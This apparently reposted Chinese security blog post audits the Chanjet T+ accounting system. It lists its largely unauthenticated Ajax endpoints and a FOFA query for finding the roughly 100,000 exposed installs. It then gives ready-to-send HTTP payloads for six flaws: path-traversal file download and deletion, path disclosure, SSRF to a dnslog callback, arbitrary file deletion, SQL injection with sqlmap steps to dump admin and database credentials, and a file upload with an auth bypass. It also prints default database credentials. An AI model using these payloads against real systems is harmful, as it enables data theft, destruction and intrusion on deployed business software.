畅捷通T+ Plus 审计 (超详细)

admin
admin
admin
138781
文章
114
评论
2024年10月20日00:47:11评论78 views字数 11283阅读37分36秒阅读模式

0x00 前言

FOFA: app="畅捷通-TPlus"           使用量:10W

畅捷通T+ Plus 审计 (超详细)

畅捷通T+这套系统有十分完备的Ajax接口 然而大部分接口都是可以无需鉴权即可使用 也导致了更多的Bug 下方为所有Ajax接口作用及其更新版本号.

1

ReportApi

Ufida.T.BAP.Web.Report.ReportApi,Ufida.T.BAP.Web

12.3

2

VoucherApi

Ufida.T.BAP.Web.Voucher.VoucherApi,Ufida.T.BAP.Web

12.3

3

OperationApi

Ufida.T.EAP.Privilege.UIP.OperationApiController,Ufida.T.EAP.Privilege.UIP

12.3

4

CloudApi

Ufida.T.MB.Controller.AuthConfigRestCtrl,Ufida.T.MB.Controller

12.3

5

RefInfo

Ufida.EAP.ReferInfos.Migrate.Controller.ReferInfoController,Ufida.EAP.ReferInfos.Migrate.Controller

12.3

6

UiConfig

Ufida.EAP.ReferInfos.Migrate.Controller.UiConfigController,Ufida.EAP.ReferInfos.Migrate.Controller

12.3

7

UserGroup

Ufida.T.EAP.Privilege.UIP.controller.UserGroupController,Ufida.T.EAP.Privilege.UIP

12.3

8

User

Ufida.T.EAP.Privilege.UIP.controller.UserController,Ufida.T.EAP.Privilege.UIP

12.3

9

previewaccount

Ufida.T.SM.UIP.UA.PreviewAccountController,Ufida.T.SM.UIP

12.3

10

report

Ufida.T.BAP.Web.Report.ReportApi,Ufida.T.BAP.Web.Report

12.3

11

search

Ufida.T.EAP.QueryExt.UIP.SearchApiController,Ufida.T.EAP.QueryExt.UIP

12.3

12

VisitPlanApi

Ufida.T.CM.UIP.VisitPlanApiController,Ufida.T.CM.UIP

12.3

13

CMApi

Ufida.T.CM.UIP.CMApiController,Ufida.T.CM.UIP

12.3

14

VisitPhoto

Ufida.T.CM.UIP.VisitPhotoController,Ufida.T.CM.UIP

12.3

15

mbreportpublish

Ufida.T.EAP.Privilege.UIP.controller.MBReportController,Ufida.T.EAP.Privilege.UIP

12.3

16

RestToken

Ufida.T.SM.Login.UIP.controller.RestTokenController,Ufida.T.SM.Login.UIP

12.3

17

CustomLogo

Ufida.T.SM.UIP.CustomLogo.CustomLogoController,Ufida.T.SM.UIP

12.3

18

TraceGraphicalApi

Chanjet.T.TXH.Base.TraceGraphicalController,Chanjet.T.TXH.Base

12.3

19

UserInfo

Ufida.T.SM.Login.UIP.controller.UserInfoController,Ufida.T.SM.Login.UIP

12.3

20

Password

Ufida.T.SM.Login.UIP.controller.PasswordController,Ufida.T.SM.Login.UIP

12.3

21

PhoneEmail

Ufida.T.SM.Login.UIP.controller.PhoneEmailController,Ufida.T.SM.Login.UIP

12.3

22

multicompclass

Ufida.T.SM.UIP.MultiCompany.MultiCompanyClassController,Ufida.T.SM.UIP

12.3

23

multicompclassmap

Ufida.T.SM.UIP.MultiCompany.MultiCompanyClassMapController,Ufida.T.SM.UIP

12.3

24

multicompclassaccount

Ufida.T.SM.UIP.MultiCompany.AccountController,Ufida.T.SM.UIP

12.3

25

PrintApi

Ufida.T.EAP.Print.Controller.CloudPrint.CloudPrintController,Ufida.T.EAP.Print.Controller

12.3

26

VoucherSearch

Ufida.T.EAP.Portal.UIP.VoucherSearchController,Ufida.T.EAP.Portal.UIP

12.3

27

GLAI

Ufida.T.GL.UIP.AI.DataCheckController,Ufida.T.GL.UIP

12.3

28

GLDS

Ufida.T.GL.UIP.GLDoc.GLCommonWebApi,Ufida.T.GL.UIP

12.3

29

tenant

Ufida.T.SM.TenantInfo.Controller.TenantInfoController,Ufida.T.SM.TenantInfo.Controller

13

30

verifycode

Ufida.T.EAP.Privilege.UIP.controller.VerifyCodeController,Ufida.T.EAP.Privilege.UIP

13

31

UpgradeTime

Ufida.T.EAP.Portal.UIP.UpgradeTimeController,Ufida.T.EAP.Portal.UIP

12.3

32

RapScript

Ufida.T.DT.UIP.Import.RapScriptController,Ufida.T.DT.UIP

13

33

Attachment

Ufida.T.EAP.VoucherExt.Controller.AttachmentController,Ufida.T.EAP.VoucherExt.Controller

13

34

InventoryImage

Ufida.T.EAP.FileHandle.Controller.InventoryImageController,Ufida.T.EAP.FileHandle.Controller

13

35

SRTemplateApi

Ufida.T.SR.SmartReport.UIP.SRTemplateApi,Ufida.T.SR.SmartReport.UIP

12.3

36

OperationLog

Ufida.T.SM.UIP.WebApi.OperationLogController,Ufida.T.SM.UIP

13

37

AuthCode

Ufida.T.SM.UIP.WebApi.AuthCodeController,Ufida.T.SM.UIP

13

38

FollowUpInfo

Ufida.T.CM.UIP.FollowUpInfoController,Ufida.T.CM.UIP

13

39

VoucherControlPlan

Ufida.T.CM.UIP.VoucherControlPlanController,Ufida.T.CM.UIP

13

40

OptionSettingApi

Ufida.T.SM.UIP.WebApi.OptionSettingApiController,Ufida.T.SM.UIP

13

41

SmApi

Ufida.T.SM.UIP.WebApi.SmApiController,Ufida.T.SM.UIP

13

42

OrderSysncSetting

Ufida.T.RE.UIP.OrderSysncSettingController,Ufida.T.RE.UIP

13

43

dstnewapi

Chanjet.T.ES.UIP.NewDST.DSTNewAPI,Chanjet.T.ES.UIP

13

44

rchkApi

Ufida.T.RCHK.UIP.RCHKReportController,Ufida.T.RCHK.UIP

13

46

patch

Ufida.T.SM.PublishService.Controller.PublishController,Ufida.T.SM.PublishService.Controller

13

47

SCMMiniProgram

Chanjet.T.MiniProgram.UIP.MiniProgramController,Chanjet.T.MiniProgram.UIP

13

48

ElebalanceApi

chanjet.T.Elebalance.UIP.ElebalanceApiController,chanjet.T.Elebalance.UIP

13

49

DataUploadApi

Ufida.T.SM.DataUpload.UIP.DataUploadApi,Ufida.T.SM.DataUpload.UIP

15

50

SRToolsAPi

Ufida.T.SR.SmartReport.UIP.SRToolsAPi,Ufida.T.SR.SmartReport.UIP

12.3

51

TaxCheckApi

Ufida.T.GL.UIP.TaxCheck.TaxCheckApi,Ufida.T.GL.UIP

13

52

WMSApi

Chanjet.T.WMS.UIP.TCWMSController,Chanjet.T.WMS.UIP

15

53

UploadJDWms

Ufida.T.AA.UIP.UploadJDWmsController,Ufida.T.AA.UIP

15

54

RdsAccount

Ufida.T.SM.UIP.WebApi.RdsAccountController,Ufida.T.SM.UIP

15

55

AllTaxDeclareApi

Ufida.T.SR.SmartReport.UIP.AllTaxDeclareApi,Ufida.T.SR.SmartReport.UIP

13

56

DevVouMsgSetApi

Ufida.T.SM.UIP.MessageCenter.DevVoucherMessageSetController,Ufida.T.SM.UIP

15

57

SelfOperation

Ufida.T.EAP.Portal.UIP.SelfOperationController,Ufida.T.EAP.Portal.UIP

15

58

BoardApi

Ufida.T.SM.UIP.WebApi.BoardController,Ufida.T.SM.UIP

15

59

isvauth

Ufida.T.SM.UIP.ISV.ISVAuthController,Ufida.T.SM.UIP

15

60

GoalAssignApi

Ufida.T.CPM.UIP.GoalAssignEditController,Ufida.T.CPM.UIP

15

61

CPMReportApi

Ufida.T.CPM.UIP.CPMReportApi,Ufida.T.CPM.UIP

15

62

CarryForwardApi

Ufida.T.SM.UIP.WebApi.CarryForwardController,Ufida.T.SM.UIP

15

63

EaApi

Ufida.T.EAP.EA.UIP.EAController,Ufida.T.EAP.EA.UIP

15

64

Backup2OssSetApi

Ufida.T.SM.UIP.Backup2OssSetController,Ufida.T.SM.UIP

15

65

PlugApi

Ufida.T.EAP.AppStore.UIP.PlugInfoController,Ufida.T.EAP.AppStore.UIP

16

66

PortalApi

Ufida.T.EAP.Portal.UIP.PortalController,Ufida.T.EAP.Portal.UIP

16

67

TopAppApi

Ufida.T.SM.UIP.WebApi.TopAppController,Ufida.T.SM.UIP

16

68

SAVoucherShare

Ufida.T.SA.UIP.SAVoucherShareController,Ufida.T.SA.UIP

16

69

AccountingCalcApi

Ufida.T.GL.UIP.Tool.AccountingCalcApi,Ufida.T.GL.UIP

15

70

HeighPictureApi

Ufida.T.GL.UIP.AI.HeighPictureApiController,Ufida.T.GL.UIP

16

71

SyncTplusDataToCC

Ufida.T.AA.UIP.SyncTplusDataController,Ufida.T.AA.UIP

16

72

BCNewRetailApi

Ufida.T.RE.UIP.BCNewRetailController,Ufida.T.RE.UIP

16

73

login

Ufida.T.SM.Login.UIP.controller.LoginController,Ufida.T.SM.Login.UIP

16

74

FactoryCalendarApi

Ufida.T.AA.UIP.FactoryCalendarApiController,Ufida.T.AA.UIP

16

75

BatchProcessDispatchApi

Ufida.T.SW.UIP.BatchProcessDispatchApiController,Ufida.T.SW.UIP

16

76

ProcessDispatchWorkbenchApi

Ufida.T.SW.UIP.ProcessDispatchWorkbenchApiController,Ufida.T.SW.UIP

16

77

XCBXApi

Ufida.T.CS.UIP.XCBXController,Ufida.T.CS.UIP

16

78

taskApi

Ufida.T.SM.UIP.WebApi.TaskApiController,Ufida.T.SM.UIP

16

79

TaskService

Ufida.T.EAP.Privilege.UIP.controller.TasServiceController,Ufida.T.EAP.Privilege.UIP

16

80

MPApi

Ufida.T.MP.UIP.MPApiController,Ufida.T.MP.UIP

16

81

SMRetailApi

Ufida.T.SM.UIP.WebApi.SMRetailController,Ufida.T.SM.UIP

16

82

LMApi

Ufida.T.LM.UIP.LMApiController,Ufida.T.LM.UIP

16

83

TMSApi

Ufida.T.LM.UIP.TMSController,Ufida.T.LM.UIP

16

0x01 前台任意文件下载+删除漏洞

/tplus/BaseInfo/DownLoadWmsUploadedFileLog.aspx  反编译相关Dll 发现其存在fileName参数可进行传入.

畅捷通T+ Plus 审计 (超详细)

通读代码 发现该代码执行逻辑为 先下载位于TemplatesWMSUploadLog下的fileName文件 然后将其删除 可以通过../跨目录.

畅捷通T+ Plus 审计 (超详细)

畅捷通T+ Plus 审计 (超详细)

Payload:

http://127.0.0.1/tplus/BaseInfo/DownLoadWmsUploadedFileLog.aspx?fileName=../../aaaa.txt

0x02 前台信息泄露漏洞

位于 Ufida.T.SM.UIP.Tool.AccountClearControler 的类存在未授权访问 路径泄露漏洞

畅捷通T+ Plus 审计 (超详细)

Payload: 

/tplus/ajaxpro/Ufida.T.SM.UIP.Tool.AccountClearControler,Ufida.T.SM.UIP.ashx?method=GetDefaultBackPath

畅捷通T+ Plus 审计 (超详细)

0x03 前台SSRF漏洞

Ufida.T.SM.UIP.UA.AddressSettingController 的类中存在TestConnnect函数 调用了下下图CheckConnnect方法 导致了前台SSRF漏洞.

畅捷通T+ Plus 审计 (超详细)

畅捷通T+ Plus 审计 (超详细)

Payload:

POST /tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx?method=TestConnnect HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8Cache-Control: no-cacheConnection: keep-aliveContent-Length: 56Content-Type: application/jsonHost: 127.0.0.1Origin: http://127.0.0.1Pragma: no-cacheReferer: http://127.0.0.1/tplus/ajaxpro/Ufida.T.SM.UIP.UA.AddressSettingController,Ufida.T.SM.UIP.ashx?method=TestConnnectUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36{  "address":"xxxxxx.dnslog.cn"}

畅捷通T+ Plus 审计 (超详细)

0x04 前台任意文件删除漏洞

Ufida.T.EAP.Voucher.WebController.AjaxImageService 的类中存在 DeleteSingImage 函数 调用了下图DeleTempImage方法 导致了任意文件删除漏洞.

畅捷通T+ Plus 审计 (超详细)

经检查发现删除目录为 /UserImages 使用 ../ 可进行跨目录 Payload:

POST /tplus/ajaxpro/Ufida.T.EAP.Voucher.WebController.AjaxImageService,Ufida.T.EAP.Voucher.WebController.ashx?method=DeleteSingleImage HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8Cache-Control: no-cacheConnection: keep-aliveContent-Length: 50Content-Type: application/jsonHost: 127.0.0.1Origin: http://127.0.0.1Pragma: no-cacheReferer: http://127.0.0.1/tplus/ajaxpro/Ufida.T.EAP.Voucher.WebController.AjaxImageService,Ufida.T.EAP.Voucher.WebController.ashx?method=DeleteSingleImageUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36{  "fileName":"../aaa.jpg"}

畅捷通T+ Plus 审计 (超详细)

0x05 前台Sql注入漏洞

默认数据库账密:TPlusDBAdmin|tplus_12345(此处为Base64加密)

位于 Ufida.T.SM.Login.UIP.LoginManager 的 CheckPassword 方法存在Sql查询操作 且未作任何过滤 导致注入漏洞产生.

畅捷通T+ Plus 审计 (超详细)

畅捷通T+ Plus 审计 (超详细)

Payload (放入Sqlmap中跑即可):

POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8Cache-Control: no-cacheConnection: keep-aliveContent-Length: 346Content-Type: application/jsonHost: 127.0.0.1Origin: http://127.0.0.1Pragma: no-cacheReferer: http://127.0.0.1/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPasswordUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36{  "AccountNum":"*",  "UserName":"admin",  "Password":"e10adc3949ba59abbe56e057f20f883e",  "rdpYear":"2022",  "rdpMonth":"2",  "rdpDate":"21",  "webServiceProcessID":"admin",  "ali_csessionid":"",  "ali_sig":"",  "ali_token":"",  "ali_scene":"",  "role":"",  "aqdKey":"",  "formWhere":"browser",  "cardNo":""}

畅捷通T+ Plus 审计 (超详细)

SQL注入畅捷通小Tips:

先执行个--sql-shell 然后直接用语句查询 select * from eap_configpath

畅捷通T+ Plus 审计 (超详细)

即可出来管理员账密+数据库账密

畅捷通T+ Plus 审计 (超详细)

0x06 后台任意文件上传漏洞

/tplus/CommonPage/UserFileUpload.aspx 文件中含有UploadUserFile函数 导致了鉴权任意文件上传(v17<= 版本可 ?preload=1 绕过)

畅捷通T+ Plus 审计 (超详细)

畅捷通T+ Plus 审计 (超详细)

Payload:

POST /tplus/CommonPage/UserFileUpload.aspx HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8Cache-Control: no-cacheConnection: keep-aliveContent-Length: 775Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMXNLGZirKX5UAvYGCookie: LOGIN_LANG=cn; ASP.NET_SessionId=oafhmiapxpe5vqesdwm4oms5; Hm_lvt_fd4ca40261bc424e2d120b806d985a14=1674191380,1674378083,1674393050,1674536169; Hm_lpvt_fd4ca40261bc424e2d120b806d985a14=1674543095Host: 127.0.0.0Origin: http://127.0.0.0Pragma: no-cacheReferer: http://127.0.0.0/tplus/CommonPage/UserFileUpload.aspxUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36----WebKitFormBoundaryMXNLGZirKX5UAvYGContent-Disposition: form-data; name="file";filename="Deep.txt"Content-Type: image/jpegHello Hack----WebKitFormBoundaryMXNLGZirKX5UAvYG-

畅捷通T+ Plus 审计 (超详细)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!

原文始发于微信公众号(星悦安全):畅捷通T+ Plus 审计 (超详细)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月20日00:47:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   畅捷通T+ Plus 审计 (超详细)https://cn-sec.com/archives/1865353.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息